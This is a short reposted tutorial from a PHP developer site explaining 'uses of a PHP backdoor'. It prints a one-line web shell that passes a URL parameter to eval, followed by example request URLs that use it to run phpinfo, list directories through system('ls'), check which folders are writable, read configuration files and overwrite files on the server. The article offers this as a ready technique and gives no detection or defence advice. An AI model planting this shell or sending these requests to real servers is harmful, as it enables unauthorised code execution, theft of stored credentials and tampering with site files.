Home  >  Article  >  Backend Development  >  Some uses of PHP backdoor

Some uses of PHP backdoor

藏色散人
藏色散人forward
2019-06-05 15:17:377026browse

Today we will talk about some of the most common uses of PHP backdoors

First, write the simplest backdoor, which can also be called a Trojan.

<?php eval($_GET[&#39;evl&#39;]);

That's it, you have obtained a lot of execution permissions on this server.

What are the usages of that scene?

Print serverphpinfo

http://www.test.com/a.php?evl=phpinfo()

Check what files are in a directory

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

Check whether the directory is writable, the next step You can create an executable file in a writable directory

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

Get the content of a file, generally used to read the configuration

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

Write files to a writable directory

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

Okay, the above part has basically destroyed the part that can be used to view a server. Let’s try to draw inferences about other functions.

The above is the detailed content of Some uses of PHP backdoor. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:aliyun.com. If there is any infringement, please contact admin@php.cn delete